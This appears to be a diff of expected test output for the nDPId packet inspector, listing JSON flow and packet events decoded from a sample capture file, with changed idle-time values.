-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEt
zamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8mliBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="} -00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEtzamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8m
liBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="} +00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 
@@ -439,31 +439,31 @@ 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"} 00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 
00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} 
-01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
